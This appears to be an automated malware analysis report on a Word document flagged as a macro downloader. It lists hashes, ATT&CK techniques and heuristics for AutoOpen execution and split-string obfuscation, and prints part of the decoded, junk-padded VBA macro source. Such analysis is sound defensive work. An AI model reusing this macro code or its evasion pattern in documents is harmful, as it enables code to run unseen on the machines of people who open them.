Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f9d9ce3cd4d3e6df…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 203.1 KB
Created: 2019-04-17 11:21:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 676562ccecc48d5d32dbbe2792467349
SHA-1: 6d1e9ce76638bc2bfcae0a75b28ece5591949807
SHA-256: f9d9ce3cd4d3e6df9100b933fbb5e4fbf5cf96291248e4b5efd975efefc43817
Risk score: 282

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1566.001 Phishing: Spearphishing Attachment

The sample is a malicious Office document carrying a VBA macro. The macro is obfuscated, including splitting keywords across string literals, to hide its intent from keyword scanning. It also uses the GetObject function and an AutoOpen macro, indicating an attempt to execute code as soon as the document is opened. The ClamAV detection and the heuristic firings together strongly suggest this is a downloader.

Heuristics (8)

  • [critical] ClamAV: Doc.Downloader.00536d-6944297-0 (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.00536d-6944297-0
  • [medium] VBA macros detected, 4 related findings (OLE_VBA_MACROS)
    The document contains VBA macro code.
  • [critical] Dangerous API name reassembled from split string literals (OLE_VBA_SPLIT_KEYWORD_OBFUSCATION)
    The VBA concatenates short string literals that reassemble a dangerous API, ProgID or LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) that appears in no single literal. Splitting an API name across a string concatenation is done only to evade keyword scanning.
  • [high] AutoOpen macro (OLE_VBA_AUTOOPEN)
    The document contains an AutoOpen macro, which Word runs automatically when the document is opened.
  • [high] GetObject call (OLE_VBA_GETOBJ)
    The macro calls GetObject, which returns a reference to a COM object by moniker or ProgID.
  • [high] VBA p-code auto-exec with execution tokens (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA (p-code) or cache stream contains an auto-execution token together with shell, download or object-execution tokens. This catches p-code-only documents, and documents where source extraction failed, so that no visible source is available.
  • [medium] Legacy WordBasic auto-exec macro marker (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    The OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface; by itself it is not a downloader or parser-CVE attribution.
  • [info] Embedded URL (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML schema namespace URI and is expected in Office content; it is not a network indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   28550 bytes
SHA-256: b4cad42e6ffc25584ff0726c421fa0c82ea1c6cbec98796cb44d3ae3dff9441a

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "lQ4DxX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "joAXZA"
Attribute VB_Base = "0{6CCF1993-C999-4F57-B273-ED66A87AD96E}{5092B10A-12CB-49F0-8E07-C503D9BA76D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "nQAAQ_"
Attribute VB_Base = "0{15E255D2-EF37-42AA-98CC-BF757E6A8AC9}{2F84DC7F-1C21-4B22-96B5-F501EE8894E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "skAAA44"
Sub autoopen()
   If mBB_UkB = FABAAUxC Then
    NUBkAQxw = 40652062 * wAAXQwC
  ElseIf SAxX_AQU = hAwQGC Then
    Set aUUoQAA = V4_XDQ
  ElseIf GUAAAw = mADADQ Then
   oA_x_DBo = HQAkB1 / cwwQQZk * FCUAAD + Sqr(h1woQkA)
  ElseIf DAZ4QDA = BAcGcA Then
   XCCZZA = 27339839
End If
   If zGCAA_ = WC4GABx Then
    IBCAcA = 427739662 * DZ41AB
  ElseIf wZcBkZAw = wXZAGc_A Then
    Set oxAZ_cUw = KQAG4Q
  ElseIf CDwx4Q = iABAAZ Then
   KCA_Uk = WXUAABA / NXAZQUA * RGUXAU + Sqr(YA1cAAA)
  ElseIf VAAQAxU = QoUAQQA Then
   WkAoxkoD = 73589769
End If
   If YUAUGkAB = fZQU_CUQ Then
    oUAABUA = 312282061 * UZAU_C
  ElseIf ZUAGUGw = iwkU1ZD Then
    Set hGBCACDA = iDwQBB
  ElseIf VDcDUcD = TBDxQ_ Then
   XUQAwA = FxcDG1 / ACBAB1 * iBcA1kA + Sqr(NUAAAXQ)
  ElseIf PCUkUDGA = hoAABCA Then
   AxccDAA = 907020580
End If
nXQ4AD
   If HxBAAAw = XQCDAw Then
    RAcQCc = 583652363 * FBGUUoUG
  ElseIf Q4_AAA = vQBAoADD Then
    Set vXAcCU = RDAoBG4
  ElseIf UBUAkB = RoGUZAAA Then
   YAAGQwkD = BcABCocw / pAAA4BxC * kAAAAA + Sqr(EZAxkQAD)
  ElseIf mADkD1Ck = CCXXAU Then
   hAGACAkA = 767101096
End If
   If wDxAAAw = E_QAABB Then
    rCABAAC = 832649815 * GAw1oD
  ElseIf Z1o4G1DZ = LA44AA Then
    Set cUCwoA = pxoXGc
  ElseIf EDZwAZ = cA4xQZx Then
   oBBBAA = dZAAAQA1 / CAoBAC1 * lGB1xA + Sqr(VXABCC1U)
  ElseIf A_wDAxc = QCQAQB Then
   NxwAUAAB = 76026590
End If
   If cUZAQA1 = o1A1Qcw1 Then
    V__AXG = 739424599 * TAAoBAXA
  ElseIf JDXCABkG = zQGUBQxD Then
    Set zAwAQA = MABDBQQ
  ElseIf aXDAxA = iGAAAkkA Then
   TAAXABAU = tAAAA1 / GwcAUQXc * KA_AAA + Sqr(YABQA4A)
  ElseIf jZxQA4 = rAA_wc Then
   iXAAwkUw = 185960431
End If
End Sub

Attribute VB_Name = "jAkXXX"
Function nXQ4AD()
On Error Resume Next
   If TDCABBA = RZUUZD4D Then
    HZk1cAA = 111488983 * zxDwAX
  ElseIf lDkQZxU = i1BxABcU Then
    Set DcA1_G = RAAQ1AwG
  ElseIf SckAUA = JwAADZAC Then
   PDGDUDA = HxkQDAG / GA1AUG * AoQGUDB + Sqr(jAA1ABB)
  ElseIf pAAQAUX = WDZDx4DA Then
   tAA1Axk = 8828071
End If
   If GUcAQ1QX = qok1ABo Then
    IcXCAxAk = 433040459 * nDAxDAw
  ElseIf nGowACQx = q4wZcQCQ Then
    Set ZADw_AU = vD4kUA
  ElseIf zQGwxc = tQ4BAA Then
   VU4BGAUw = LQw_AD_G / hk_XQD4w * q_UUUc + Sqr(WwD_ZDQA)
  ElseIf lAD4_UA = Wx4AXD_D Then
   bQBAQw = 763825975
End If
   If jAZQkx4 = PcGDkAD Then
    NUBcAAk = 110199077 * MAcX4QQ
  ElseIf bBkUGA = T_ABZQQZ Then
    Set jAAGxAkA = pAADAA
  ElseIf HAoDQCAG = nAAGABAQ Then
   dZAx_AcA = nBAAD_ / GQAAoX * ukAwXAQ + Sqr(iABoACA)
  ElseIf JXUAADZ = jcw4DkA Then
   DUDZxXAU = 418060932
End If
If 7304 < 17404 Then
VABXAA = vbFalse
   If fGBDAcAo = Vw_BAA Then
    YAwA_XQA = 288468827 * F4AAAkwX
  ElseIf uAAwXAkQ = nZXAwGQ Then
    Set qXGUAx_ = BAwAwk
  ElseIf wB1AUU = J4AoAQA Then
   UZwGAwUU = WwZAA4CU / MAABCAAx * NAw_BAD + Sqr(SB_AGUw)
  ElseIf U1oDDkB = iU4QUw4_ Then
   CAUw1A = 877920435
End If
   If dUA4CUD = r1UAAZ_A Then
    wBADAAUA = 350890717 * jQAAZAQA
  ElseIf zxQABU = rcAGBQ4 Then
    Set lXBCcUA = ZAQAAAQQ
  ElseIf kBDUAAZU = jUAXBAAD Then
   
... (truncated)